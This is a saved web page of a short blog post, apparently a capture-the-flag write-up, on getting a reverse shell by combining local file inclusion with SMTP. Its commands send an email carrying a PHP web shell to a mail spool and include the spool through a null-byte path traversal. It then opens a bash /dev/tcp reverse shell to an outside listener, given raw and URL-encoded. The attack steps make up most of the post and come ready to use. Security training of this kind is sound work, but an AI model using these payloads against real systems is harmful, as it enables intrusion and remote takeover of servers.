<!DOCTYPE html>
<html data-darkreader-mode="dynamic" data-darkreader-scheme="dark"><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8"><style class="darkreader darkreader--fallback" media="screen"></style><style class="darkreader darkreader--text" media="screen"></style><style class="darkreader darkreader--invert" media="screen">.jfk-bubble.gtx-bubble, .captcheck_answer_label > input + img, span#closed_text > img[src^="https://www.gstatic.com/images/branding/googlelogo"], span[data-href^="https://www.hcaptcha.com/"] > #icon, #bit-notification-bar-iframe, ::-webkit-calendar-picker-indicator {
    filter: invert(100%) hue-rotate(180deg) contrast(90%) !important;
}</style><style class="darkreader darkreader--inline" media="screen">[data-darkreader-inline-bgcolor] {
  background-color: var(--darkreader-inline-bgcolor) !important;
}
[data-darkreader-inline-bgimage] {
  background-image: var(--darkreader-inline-bgimage) !important;
}
[data-darkreader-inline-border] {
  border-color: var(--darkreader-inline-border) !important;
}
[data-darkreader-inline-border-bottom] {
  border-bottom-color: var(--darkreader-inline-border-bottom) !important;
}
[data-darkreader-inline-border-left] {
  border-left-color: var(--darkreader-inline-border-left) !important;
}
[data-darkreader-inline-border-right] {
  border-right-color: var(--darkreader-inline-border-right) !important;
}
[data-darkreader-inline-border-top] {
  border-top-color: var(--darkreader-inline-border-top) !important;
}
[data-darkreader-inline-boxshadow] {
  box-shadow: var(--darkreader-inline-boxshadow) !important;
}
[data-darkreader-inline-color] {
  color: var(--darkreader-inline-color) !important;
}
[data-darkreader-inline-fill] {
  fill: var(--darkreader-inline-fill) !important;
}
[data-darkreader-inline-stroke] {
  stroke: var(--darkreader-inline-stroke) !important;
}
[data-darkreader-inline-outline] {
  outline-color: var(--darkreader-inline-outline) !important;
}
[data-darkreader-inline-stopcolor] {
  stop-color: var(--darkreader-inline-stopcolor) !important;
}</style><style class="darkreader darkreader--variables" media="screen">:root {
   --darkreader-neutral-background: #131516;
   --darkreader-neutral-text: #d8d4cf;
   --darkreader-selection-background: #004daa;
   --darkreader-selection-text: #e8e6e3;
}</style><style class="darkreader darkreader--root-vars" media="screen"></style><style class="darkreader darkreader--user-agent" media="screen">html {
    background-color: #181a1b !important;
}
html, body, input, textarea, select, button {
    background-color: #181a1b;
}
html, body, input, textarea, select, button {
    border-color: #736b5e;
    color: #e8e6e3;
}
a {
    color: #3391ff;
}
table {
    border-color: #545b5e;
}
::placeholder {
    color: #b2aba1;
}
input:-webkit-autofill,
textarea:-webkit-autofill,
select:-webkit-autofill {
    background-color: #555b00 !important;
    color: #e8e6e3 !important;
}
::-webkit-scrollbar {
    background-color: #202324;
    color: #aba499;
}
::-webkit-scrollbar-thumb {
    background-color: #454a4d;
}
::-webkit-scrollbar-thumb:hover {
    background-color: #575e62;
}
::-webkit-scrollbar-thumb:active {
    background-color: #484e51;
}
::-webkit-scrollbar-corner {
    background-color: #181a1b;
}
* {
    scrollbar-color: #454a4d #202324;
}
::selection {
    background-color: #004daa !important;
    color: #e8e6e3 !important;
}
::-moz-selection {
    background-color: #004daa !important;
    color: #e8e6e3 !important;
}</style>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1">

  <title>Using LFI and SMTP to Get a Reverse Shell</title>
  <meta name="description" content="Local file inclusion or LFI can be used in many ways to execute remote commands and get a reverse shell. Some of them are injecting commands through apache a...">

  <link rel="stylesheet" href="Using%20LFI%20and%20SMTP%20to%20Get%20a%20Reverse%20Shell_files/main.css"><style class="darkreader darkreader--sync" media="screen"></style>
  <link rel="canonical" href="http://janithmalinga.github.io/redteam/ctf/2020/02/12/Using-LFI-and-SMTP-to-get-a-Shell.html">
  <link rel="alternate" type="application/rss+xml" title="Security Findings" href="http://janithmalinga.github.io/feed.xml">
  <link rel="shortcut icon" type="image/png" href="https://janithmalinga.github.io/redteam/ctf/2020/02/12/_images/j.svg">
<meta name="darkreader" content="48299895d6ba4222b76e1f300bdbdf8e"><style class="darkreader darkreader--override" media="screen">.vimvixen-hint {
    background-color: #7b5300 !important;
    border-color: #d8b013 !important;
    color: #f3e8c8 !important;
}
::placeholder {
    opacity: 0.5 !important;
}
a[href="https://coinmarketcap.com/"] > svg[width="94"][height="16"] > path {
    fill: var(--darkreader-neutral-text) !important;
}
#edge-translate-panel-body,
.MuiTypography-body1 {
    color: var(--darkreader-neutral-text) !important;
}
gr-main-header {
    background-color: #0f3a48 !important;
}
embed[type="application/pdf"] { filter: invert(100%) contrast(90%); }</style></head>


  <body>

    <header class="site-header">

  <div class="wrapper">

    <a class="site-title" href="https://janithmalinga.github.io/">Security Findings</a>

    <nav class="site-nav">
      <a href="#" class="menu-icon">
        <svg viewBox="0 0 18 15">
          <path fill="#424242" d="M18,1.484c0,0.82-0.665,1.484-1.484,1.484H1.484C0.665,2.969,0,2.304,0,1.484l0,0C0,0.665,0.665,0,1.484,0 h15.031C17.335,0,18,0.665,18,1.484L18,1.484z" style="--darkreader-inline-fill: #beb9b0;" data-darkreader-inline-fill=""></path>
          <path fill="#424242" d="M18,7.516C18,8.335,17.335,9,16.516,9H1.484C0.665,9,0,8.335,0,7.516l0,0c0-0.82,0.665-1.484,1.484-1.484 h15.031C17.335,6.031,18,6.696,18,7.516L18,7.516z" style="--darkreader-inline-fill: #beb9b0;" data-darkreader-inline-fill=""></path>
          <path fill="#424242" d="M18,13.516C18,14.335,17.335,15,16.516,15H1.484C0.665,15,0,14.335,0,13.516l0,0 c0-0.82,0.665-1.484,1.484-1.484h15.031C17.335,12.031,18,12.696,18,13.516L18,13.516z" style="--darkreader-inline-fill: #beb9b0;" data-darkreader-inline-fill=""></path>
        </svg>
      </a>

      <div class="trigger">
        
          
          <a class="page-link" href="https://janithmalinga.github.io/about/">About</a>
          
        
          
        
          
        
          
        
          
        
      </div>
    </nav>

  </div>

</header>


    <div class="page-content">
      <div class="wrapper">
        <article class="post" itemscope="" itemtype="http://schema.org/BlogPosting">

  <header class="post-header">
    <h1 class="post-title" itemprop="name headline">Using LFI and SMTP to Get a Reverse Shell</h1>
    <p class="post-meta"><time datetime="2020-02-12T02:42:24+00:00" itemprop="datePublished">Feb 12, 2020</time></p>
  </header>

  <div class="post-content" itemprop="articleBody">
    <p>Local file inclusion or LFI can be used in many ways to execute 
remote commands and get a reverse shell. Some of them are injecting 
commands through 
apache access log or injecting commands through error logs. This article
 is little bit different than those techniques
we are going to send the payload through SMTP(mail) and then we are 
going to execute remote commands.</p>

<p>This image shows the lfi that I have found,</p>

<p><img src="Using%20LFI%20and%20SMTP%20to%20Get%20a%20Reverse%20Shell_files/lfi-smtp-1.png" alt="LFI by burpsuite"></p>

<p>After finding the LFI, next step step is to write the system command 
on a file which we know the path, In this tutorial I’m going to write 
the system command that we need to execute in the mail folder using smtp
 protocol. Here are the commands I used to send a mail including the 
payload 
that we need to execute.</p>

<h2 id="send-the-mail-with-payload-in-it">Send the mail with payload in it</h2>

<p>first connect to the smtp port using telnet,</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>telnet 10.10.10.7 25
</code></pre></div></div>
<p>Sending the email with embeded payload in the body,</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>EHLO test.com

VRFY asterisk@localhost
mail from: test.com
rcpt to: asterisk@localhost
data
Subject: This is exploit
&lt;?php echo system($_REQUEST['cmd']); ?&gt;
.
quit
</code></pre></div></div>
<p>now go to burpsuite and access the file “../../../../../../../..//var/mail/asterisk%00”</p>

<p><img src="Using%20LFI%20and%20SMTP%20to%20Get%20a%20Reverse%20Shell_files/lfi-smtp-2.png" alt="exploit saved in the mail"></p>

<p>Yes we successfully exploited the whoami command n the system.</p>

<h2 id="getting-the-reverse-shell">Getting the reverse shell</h2>

<p>For this task I’m using bash reverse shell on linux. Here is the command,</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bash -i&gt;&amp; /dev/tcp/10.10.14.3/1337 0&gt;&amp;1
</code></pre></div></div>

<p>Then url encode it,</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bash+-i&gt;%26+/dev/tcp/10.10.14.3/1337+0&gt;%261
</code></pre></div></div>
<p>using a netcat listner we can catch the reverse shell</p>

<p><img src="Using%20LFI%20and%20SMTP%20to%20Get%20a%20Reverse%20Shell_files/lfi-smtp-3.png" alt="Got the reverse shell"></p>


  </div>

</article>

      </div>
    </div>

    <footer class="site-footer">

  <div class="wrapper">

    <h2 class="footer-heading">Security Findings</h2>

    <div class="footer-col-wrapper">
      <div class="footer-col footer-col-1">
        <ul class="contact-list">
          <li>Security Findings</li>
          <li><a href="mailto:itjanith@gmail.com">itjanith@gmail.com</a></li>
        </ul>
      </div>

      <div class="footer-col footer-col-2">
        <ul class="social-media-list">
          
          <li>
            <a href="https://github.com/janithmalinga"><span class="icon icon--github"><svg viewBox="0 0 16 16"><path fill="#828282" d="M7.999,0.431c-4.285,0-7.76,3.474-7.76,7.761 c0,3.428,2.223,6.337,5.307,7.363c0.388,0.071,0.53-0.168,0.53-0.374c0-0.184-0.007-0.672-0.01-1.32 c-2.159,0.469-2.614-1.04-2.614-1.04c-0.353-0.896-0.862-1.135-0.862-1.135c-0.705-0.481,0.053-0.472,0.053-0.472 c0.779,0.055,1.189,0.8,1.189,0.8c0.692,1.186,1.816,0.843,2.258,0.645c0.071-0.502,0.271-0.843,0.493-1.037 C4.86,11.425,3.049,10.76,3.049,7.786c0-0.847,0.302-1.54,0.799-2.082C3.768,5.507,3.501,4.718,3.924,3.65 c0,0,0.652-0.209,2.134,0.796C6.677,4.273,7.34,4.187,8,4.184c0.659,0.003,1.323,0.089,1.943,0.261 c1.482-1.004,2.132-0.796,2.132-0.796c0.423,1.068,0.157,1.857,0.077,2.054c0.497,0.542,0.798,1.235,0.798,2.082 c0,2.981-1.814,3.637-3.543,3.829c0.279,0.24,0.527,0.713,0.527,1.437c0,1.037-0.01,1.874-0.01,2.129 c0,0.208,0.14,0.449,0.534,0.373c3.081-1.028,5.302-3.935,5.302-7.362C15.76,3.906,12.285,0.431,7.999,0.431z" style="--darkreader-inline-fill: #999083;" data-darkreader-inline-fill=""></path></svg>
</span><span class="username">janithmalinga</span></a>

          </li>
          

          
          <li>
            <a href="https://twitter.com/janithSmalinga"><span class="icon icon--twitter"><svg viewBox="0 0 16 16"><path fill="#828282" d="M15.969,3.058c-0.586,0.26-1.217,0.436-1.878,0.515c0.675-0.405,1.194-1.045,1.438-1.809c-0.632,0.375-1.332,0.647-2.076,0.793c-0.596-0.636-1.446-1.033-2.387-1.033c-1.806,0-3.27,1.464-3.27,3.27 c0,0.256,0.029,0.506,0.085,0.745C5.163,5.404,2.753,4.102,1.14,2.124C0.859,2.607,0.698,3.168,0.698,3.767 c0,1.134,0.577,2.135,1.455,2.722C1.616,6.472,1.112,6.325,0.671,6.08c0,0.014,0,0.027,0,0.041c0,1.584,1.127,2.906,2.623,3.206 C3.02,9.402,2.731,9.442,2.433,9.442c-0.211,0-0.416-0.021-0.615-0.059c0.416,1.299,1.624,2.245,3.055,2.271 c-1.119,0.877-2.529,1.4-4.061,1.4c-0.264,0-0.524-0.015-0.78-0.046c1.447,0.928,3.166,1.469,5.013,1.469 c6.015,0,9.304-4.983,9.304-9.304c0-0.142-0.003-0.283-0.009-0.423C14.976,4.29,15.531,3.714,15.969,3.058z" style="--darkreader-inline-fill: #999083;" data-darkreader-inline-fill=""></path></svg>
</span><span class="username">janithSmalinga</span></a>

          </li>
          
        </ul>
      </div>

      <div class="footer-col footer-col-3">
        <p>Cyber security is a vast and a volatile feild. Always the 
technology is changing. We can not  servive alone. Sharing knowledge is 
the main advantage for us white hat hackers. This site is  for sharing 
knowledge. My main research area are Application Security, Network 
Security Monitoring and Forensic Analysis.   
</p>
      </div>
    </div>

  </div>

</footer>


  


</body></html>